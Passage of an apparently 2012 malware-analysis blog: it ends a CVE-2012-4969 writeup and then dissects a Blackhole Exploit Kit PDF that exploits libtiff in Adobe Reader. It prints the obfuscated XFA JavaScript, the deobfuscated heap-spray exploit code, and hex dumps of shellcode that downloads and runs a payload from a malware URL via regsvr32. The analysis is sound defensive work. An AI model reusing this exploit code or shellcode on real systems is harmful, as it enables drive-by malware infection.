00000360  40 ba 7f a0 65 97 cb 1e  a4 64 ef 93 32 e4 94 8e  |@...e....d..2...|
00000370  13 0a ac c2 19 4b 01 c4  8d 1f 74 57 66 0d ff 43  |.....K....tWf..C|
00000380  be ac db 7d f0 a5 9a 52  fe a7 da 3e 1d b6 39 b8  |...}...R...>..9.|
00000390  69 d4 1b be 7f 66 a0 fc  a9 37 ad 98 0a 10 f8 80  |i....f...7......|
000003a0  d6 af 9a fb 53 15 66 68  74 74 70 3a 2f 2f 77 6d  |....S.fhttp://wm|
000003b0  62 2e 35 31 35 31 6c 70  2e 63 6f 6d 2f 74 74 78  |b.5151lp.com/ttx|
000003c0  7a 2e 74 78 74 00 7e 7e                           |z.txt.~~|

The Binary

I manage to get the binary. However, I'm a bit confused as the binary seems not to be a valid windows executable format, and it won't execute in sandbox. I sent the sample to VT which resulted 0/0 (https://www.virustotal.com/file/7b46896e5d6113b472fbf3ca95bcd2139671de480e2c4dbf165b21ef0dde055a/analysis/)

If any of you readers would like to have the sample for further analysis, just ping me and I would love to share the sample, and feel free to share any findings from that if you have.

Conclusion

From the analysis, and some other research, I've a verdict that this exploitation have got to do with CVE-2012-4969 vulnerability. The source of <img> tag which assign as 51.la URL might have return the value of "YMjf\u0c08\u0c0cKDogjsiIejengNEkoPDjfiJDIWUAzdfghjAAuUFGGBSIPPPUDFJKSOQJGH" to exploit CMshtmlEd::Exec function in mshtml.dll in Microsoft Internet Explorer 6 through 9 allows remote attackers to execute arbitrary code.

As for the binary itself, it is not the final payload to deliver to the users. With its filesize of 8.0KB, it might be used as an intermediary to download another binary to install on users computer.

That's it for now, bye bye.

Tuesday, October 2, 2012

An Evening with Blackhole Exploit Kit v2.0 III

From my previous post, I managed to get the PDF sample from the exploit page and consequently get the payload within the PDF exploit itself.

As I discussed in the previous post about function x() which used to decode the URL parameter in show_pdf2(), with any values inside cpdgszkh, uln and wjlajcro, I get the same PDF sample. So as for now, I just assume that those URL parameter values has no cross-checking on blackhole backend.

With the PDF sample that I got, I started the analysis. The sample was crafted to exploit libtiff vulnerability in Adobe Reader. The common libtiff exploit will use contentType="image/tiff" to embed the exploit + payload encoded in base64. This method can be easily analyzed by decoding the base64 and get the payload straight away.

As for Blackhole exploit kit version of libtiff exploit (and many other in-the-wild sample), they will add another layer of obfuscation method by using JavaScript obfuscation before getting into the tiff exploit + payload. We can check through contentType="application/x-javascript".

<xfa:script contentType='application/x-javascript'>
/*sagasgasgasg
with(event){
k=target.eval;
if((app.addMenuItem+"")!=-1){a=target.keywords;}
}*/
with(event){
k=target.eval;
if((app.addMenuItem+"").indexOf('native')!=-1){a=target.keywords;}
}
s="";
z=a;
for(i=0;i<a.length;i+=2){
 s+=String.fromCharCode(parseInt(z[i]+z[i+1],28));
}
k(s);
</xfa:script>

From above JS code snippet, with the help of fromCharCode and parseInt, JS code will execute eval within the values of target.keywords. In usual manner, target.keywords (or previously used this.keywords) will get the value from PDF key, /Keywords.

3 0 obj<</Keywords(3d40401i3d3o3h4244253h463h3q441i443d423j3h441i3f423h3d443l3r3q2c3d443h1i423h403o3d3f3h1c1j1g1j3j1g1b1b1d23463d4214403d3g3g3l3q3j23463d42143e3e3e1g143f3f3f1g143g3g3g1g143h3h3h1g143i3i3i1g143j3j3j1g143k3k3k23463d4214403r3l3q443h42433b3d1g143l23463d4214481425143q3h47142942423d491c1d23463d4214491425143q3h471
...
snip
...
3b3o3o1m253b3m3l1l1c3b3m1r1g1b1b1d233l3i1c3b3o3o1m1i3o3h3q3j443k191m1d3b3o3o1m1f25453q3h433f3d403h1c1b191k1k1b1d233b3o3o1n253b3m1m1c3b3o3o1m1d23473l443k1c4b3n223b3o3o1n4d1d3b2h1k1c3n1d232h3p3d3j3h2e3l3h3o3g1l1i423d47323d3o453h253b3o3o1l4d3b3m1n1c1d23)

By replacing target.keywords with the value in /Keywords and execute the eval, another JS code generated which obviously its purpose to craft the payload with the exploit itself. The payload seems to be obfuscated as well, this time it was target.creationDate, which similar as target.keywords, it find the value inside PDF key /CreationDate. Below are the beautified version;

app.alert = event.target.creationDate.replace(/,/g, '');
var padding;
var bbb, ccc, ddd, eee, fff, ggg, hhh;
var pointers_a, i;
var x = new Array();
var y = new Array();
var _l1 = "4c20600f0517804a3c20600f0f63804aa3eb804a3020824a6e2f804a41414141260000000000000000000000000000001239804a6420600f000400004141414141414141" + event.target.creationDate.replace(/,/g, '');
var _l2 = "4c20600fa563804a3c20600f9621804a901f804a3090844a7d7e804a41414141260000000000000000000000000000007188804a6420600f000400004141414141414141" + event.target.creationDate.replace(/,/g, '');
_l3 = app;
_l4 = new Array();

function _l5() {
    var _l6 = _l3.viewerVersion.toString();
    _l6 = _l6.replace('.', '');
    while (_l6.length < 4) _l6 += '0';
    return parseInt(_l6, 10)
}
function _l7(_l8, _l9) {
    while (_l8.length * 2 < _l9) _l8 += _l8;
    return _l8.substring(0, _l9 / 2)
}
function _I0(_I1) {
    _I1 = unescape(_I1);
    roteDak = _I1.length * 2;
    dakRote = unescape('%u9090');
    spray = _l7(dakRote, 0x2000 - roteDak);
    loxWhee = _I1 + spray;
    loxWhee = _l7(loxWhee, 524098);
    for (i = 0; i < 400; i++) _l4[i] = loxWhee.substr(0, loxWhee.length - 1) + dakRote;
}
function _I2(_I1, len) {
    while (_I1.length < len) _I1 += _I1;
    return _I1.substring(0, len)
}
function _I3(_I1) {
    ret = '';
    for (i = 0; i < _I1.length; i += 2) {
        b = _I1.substr(i, 2);
        c = parseInt(b, 16);
        ret += String.fromCharCode(c);
    }
    return ret
}
function _ji1(_I1, _I4) {
    _I5 = '';
    for (_I6 = 0; _I6 < _I1.length; _I6++) {
        _l9 = _I4.length;
        _I7 = _I1.charCodeAt(_I6);
        _I8 = _I4.charCodeAt(_I6 % _l9);
        _I5 += String.fromCharCode(_I7 ^ _I8);
    }
    return _I5
}
function _I9(_I6) {
    _j0 = _I6.toString(16);
    _j1 = _j0.length;
    _I5 = (_j1 % 2) ? '0' + _j0 : _j0;
    return _I5
}
function _j2(_I1) {
    _I5 = '';
    for (_I6 = 0; _I6 < _I1.length; _I6 += 2) {
        _I5 += '%u';
        _I5 += _I9(_I1.charCodeAt(_I6 + 1));
        _I5 += _I9(_I1.charCodeAt(_I6))
    }
    return _I5
}
function _j3() {
    _j4 = _l5();
    if (_j4 < 9000) {
        _j5 = 'o+uASjgggkpuL4BK/////wAAAABAAAAAAAAAAAAQAAAAAAAAfhaASiAgYA98EIBK';
        _j6 = _l1;
        _j7 = _I3(_j6)
    } else {
        _j5 = 'kB+ASjiQhEp9foBK/////wAAAABAAAAAAAAAAAAQAAAAAAAAYxCASiAgYA/fE4BK';
        _j6 = _l2;
        _j7 = _I3(_j6)
    }
    _j8 = 'SUkqADggAABB';
    _j9 = _I2('QUFB', 10984);
    _ll0 = 'QQcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwEEAAEAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////';
    _ll1 = _j8 + _j9 + _ll0 + _j5;
    _ll2 = _ji1(_j7, '');
    if (_ll2.length % 2) _ll2 += unescape('');
    _ll3 = _j2(_ll2);
    with({
        k: _ll3
    }) _I0(k);
    ImageField1.rawValue = _ll1
}
_j3();

Looking into variables _l1 and _l2, obviously it is a shellcode that might contains the URL for DownloadExec. Thus we combine it with the value inside /CreationDate, and we get the full shellcode.

00000000  4c 20 60 0f 05 17 80 4a  3c 20 60 0f 0f 63 80 4a  |L `....J< `..c.J|
00000010  a3 eb 80 4a 30 20 82 4a  6e 2f 80 4a 41 41 41 41  |...J0 .Jn/.JAAAA|
00000020  26 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |&...............|
00000030  12 39 80 4a 64 20 60 0f  00 04 00 00 41 41 41 41  |.9.Jd `.....AAAA|
00000040  41 41 41 41 66 83 e4 fc  fc 85 e4 75 34 e9 5f 33  |AAAAf......u4._3|
00000050  c0 64 8b 40 30 8b 40 0c  8b 70 1c 56 8b 76 08 33  |[email protected]@..p.V.v.3|
00000060  db 66 8b 5e 3c 03 74 33  2c 81 ee 15 10 ff ff b8  |.f.^<.t3,.......|
00000070  8b 40 30 c3 46 39 06 75  fb 87 34 24 85 e4 75 51  |[email protected]$..uQ|
00000080  e9 eb 4c 51 56 8b 75 3c  8b 74 35 78 03 f5 56 8b  |..LQV.u<.t5x..V.|
00000090  76 20 03 f5 33 c9 49 41  fc ad 03 c5 33 db 0f be  |v ..3.IA....3...|
000000a0  10 38 f2 74 08 c1 cb 0d  03 da 40 eb f1 3b 1f 75  |[email protected];.u|
000000b0  e6 5e 8b 5e 24 03 dd 66  8b 0c 4b 8d 46 ec ff 54  |.^.^$..f..K.F..T|
000000c0  24 0c 8b d8 03 dd 8b 04  8b 03 c5 ab 5e 59 c3 eb  |$...........^Y..|
000000d0  53 ad 8b 68 20 80 7d 0c  33 74 03 96 eb f3 8b 68  |S..h .}.3t.....h|
000000e0  08 8b f7 6a 05 59 e8 98  ff ff ff e2 f9 e8 00 00  |...j.Y..........|
000000f0  00 00 58 50 6a 40 68 ff  00 00 00 50 83 c0 19 50  |[email protected]|
00000100  55 8b ec 8b 5e 10 83 c3  05 ff e3 68 6f 6e 00 00  |U...^......hon..|
00000110  68 75 72 6c 6d 54 ff 16  83 c4 08 8b e8 e8 61 ff  |hurlmT........a.|
00000120  ff ff eb 02 eb 72 81 ec  04 01 00 00 8d 5c 24 0c  |.....r.......\$.|
00000130  c7 04 24 72 65 67 73 c7  44 24 04 76 72 33 32 c7  |..$regs.D$.vr32.|
00000140  44 24 08 20 2d 73 20 53  68 f8 00 00 00 ff 56 0c  |D$. -s Sh.....V.|
00000150  8b e8 33 c9 51 c7 44 1d  00 77 70 62 74 c7 44 1d  |..3.Q.D..wpbt.D.|
00000160  05 2e 64 6c 6c c6 44 1d  09 00 59 8a c1 04 30 88  |..dll.D...Y...0.|
00000170  44 1d 04 41 51 6a 00 6a  00 53 57 6a 00 ff 56 14  |D..AQj.j.SWj..V.|
00000180  85 c0 75 16 6a 00 53 ff  56 04 6a 00 83 eb 0c 53  |..u.j.S.V.j....S|
00000190  ff 56 04 83 c3 0c eb 02  eb 13 47 80 3f 00 75 fa  |.V........G.?.u.|
000001a0  47 80 3f 00 75 c4 6a 00  6a fe ff 56 08 e8 9c fe  |G.?.u.j.j..V....|
000001b0  ff ff 8e 4e 0e ec 98 fe  8a 0e 89 6f 01 bd 33 ca  |...N.......o..3.|
000001c0  8a 5b 1b c6 46 79 36 1a  2f 70 68 74 74 70 3a 2f  |.[..Fy6./phttp:/|
000001d0  2f 73 65 63 74 61 6e 74  65 73 2d 78 2e 72 75 3a  |/sectantes-x.ru:|
000001e0  38 30 38 30 2f 66 6f 72  75 6d 2f 6c 69 6e 6b 73  |8080/forum/links|
000001f0  2f 63 6f 6c 75 6d 6e 2e  70 68 70 3f 61 77 67 6e  |/column.php?awgn|
00000200  73 67 6a 3d 30 61 30 62  30 39 30 33 30 62 26 67  |sgj=0a0b09030b&g|
00000210  62 6f 76 69 3d 33 33 30  37 30 39 33 37 33 38 30  |bovi=33070937380|
00000220  37 30 37 33 36 30 36 30  62 26 74 6f 77 68 67 66  |70736060b&towhgf|
00000230  3d 30 33 26 61 6d 79 77  79 65 72 6d 3d 6a 71 69  |=03&amywyerm=jqi|
00000240  73 79 7a 74 26 73 71 65  6d 68 3d 68 79 69 6d 6a  |syzt&sqemh=hyimj|
00000250  00 00                                             |..|
00000252

[[email protected] analysis]$ ruby virustotal.rb column.php\?awgnsgj\=0a0b09030b\&gbovi\=3307093738070736060b\&towhgf\=03\&amywyerm\=jqisyzt\&sqemh\=hyimj
warning: peer certificate won't be verified in this SSL session
Date submitted:  2012-09-30 18:54:40
      Fortinet:  W32/Kryptik.AB!tr
    TrendMicro:  WORM_CRIDEX.DI
      Symantec:  Trojan.Gen
           AVG:  Agent_r.BNO
   BitDefender:  Trojan.Generic.KDV.742222
         GData:  Trojan.Generic.KDV.742222
       ViRobot:  Trojan.Win32.A.PornoAsset.137216.C
        F-Prot:  W32/Falab.F16.gen!Eldorado
     AhnLab-V3:  Trojan/Win32.PornoAsset
      F-Secure:  Trojan.Generic.KDV.742222
      nProtect:  Trojan.Generic.KDV.742222
        Ikarus:  Trojan-Ransom.Win32.PornoAsset
         VIPRE:  Trojan.Win32.Generic!BT
         Panda:  Suspicious file
         Avast:  Win32:Carberp-AJF [Trj]
 CAT-QuickHeal:  (Suspicious) - DNAScan
    ESET-NOD32:  a variant of Win32/Kryptik.AMHF
       PCTools:  Trojan.Gen
     Commtouch:  W32/Falab.F16.gen!Eldorado
McAfee-GW-Edition:  Ransom!gu
     Kaspersky:  Trojan-Ransom.Win32.PornoAsset.abup
        Sophos:  Mal/Ransom-Z
         DrWeb:  Trojan.DownLoad2.39083
        Norman:  W32/Kryptik.BUS
       AntiVir:  TR/Rogue.kdv.742222
        Comodo:  UnclassifiedMalware
        McAfee:  Artemis!9F86A132C0A5

With the sample analyzed, I take the opportunity to write yara rule from that PDF sample, again, just to exercise pattern and generalization of different samples.

[[email protected] analysis]$ python pdf-parser.py -f -w column.php\?cpdgszkh\=0a0b09030b\&uln\=44\&rfor\=3307093738070736060b\&wjlajcro\=0b00040003 > inflated_pdf.pdf 
[[email protected] analysis]$ yara -r PDF.yar inflated_pdf.pdf
CVE_2011_2462_libTIFF_Blackhole inflated_pdf.pdf